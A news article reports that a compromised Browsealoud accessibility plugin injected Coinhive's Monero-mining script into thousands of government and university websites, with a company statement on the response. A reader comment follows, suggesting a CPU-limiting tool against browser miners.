Cryptojackers Strike Again, Hitting Thousands of Sites Including US and UK Government Pages

Image: Screengrab via Coinhive
Image: Screengrab via Coinhive

Thousands of websites including ones run by the U.S. and U.K. governments secretly hijacked browsers to mine cryptocurrency thanks to a compromised plugin, the Register reported on Sunday.

Advertisement

According to the Register, all of the afflicted websites ran British tech company Texthelp’s Browsealoud plugin, which reads out websites for people with visual impairments like full or partial blindness or conditions like dyslexia. It’s unknown at this time whether the someone external to the company was able to compromise the plugin or an insider decided to hijack it for fun and profit, but the list of websites is pretty extensive:

A list of 4,200-plus affected websites can be found here: they include The City University of New York (cuny.edu), Uncle Sam’s court information portal (uscourts.gov), Lund University (lu.se), the UK’s Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner’s Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), plus a shedload of other .gov.uk and .gov.au sites, UK NHS services, and other organizations across the globe.

Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.

Advertisement

The afflicted pages ran a Javascript-powered Monero miner from Coinhive, the very one which has been implicated in numerous similar incidents. Coinhive, which takes a 30 percent cut of anything mined using unmodified versions of its plugin, officially discourages embedding their miner in websites without informing users up front that it may take a (sometimes significant) slice of their computers’ processing power. But unscrupulous cybercriminals have used it to run Monero-generating botnets that in theory always turn a profit because there’s no real overhead and they’re not paying for the electricity used. Offloading those costs to random web users by injecting miners into other peoples’ websites, an attack called cryptojacking, has quickly become widespread and prior attacks are estimated to have generated hundreds of thousands in profits for hackers.

“The injected mining code was obfuscated, but when converted from hexadecimal back to ASCII it spelled out the necessary magic to summon Coinhive’s stealthy JavaScript miner to the page,” the Register reported.

The price of XMR, Monero’s token, peaked at nearly $500 earlier this month but has since fallen back down to around $240, according to sites which track the prices of cryptocurrency.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline,” Texthelp chief technology officer Martin McKay said in a statement. The company added that “This was a criminal act and a thorough investigation is currently underway” by an independent security company.

Advertisement

[The Register]

"... An upperclassman who had been researching terrorist groups online." - Washington Post

Share This Story

Get our newsletter

DISCUSSION

notspecified
Akinetopsia

With all the new miners popping up, sometimes your ad blocker might miss some, so I suggest using BES (http://mion.faireal.net/BES/).

Using this application you can select a process tree (all running instances of a same executable) and limit the CPU usage for that specific program. By blocking the CPU usage of your browser, you will then starve the miners from what they want. I’ve set it at 15% of my CPU and havent seen any issues yet. No website should require more than that.

The added benefit is that you can probably find culprits easily as the browser will probably become unresponsive.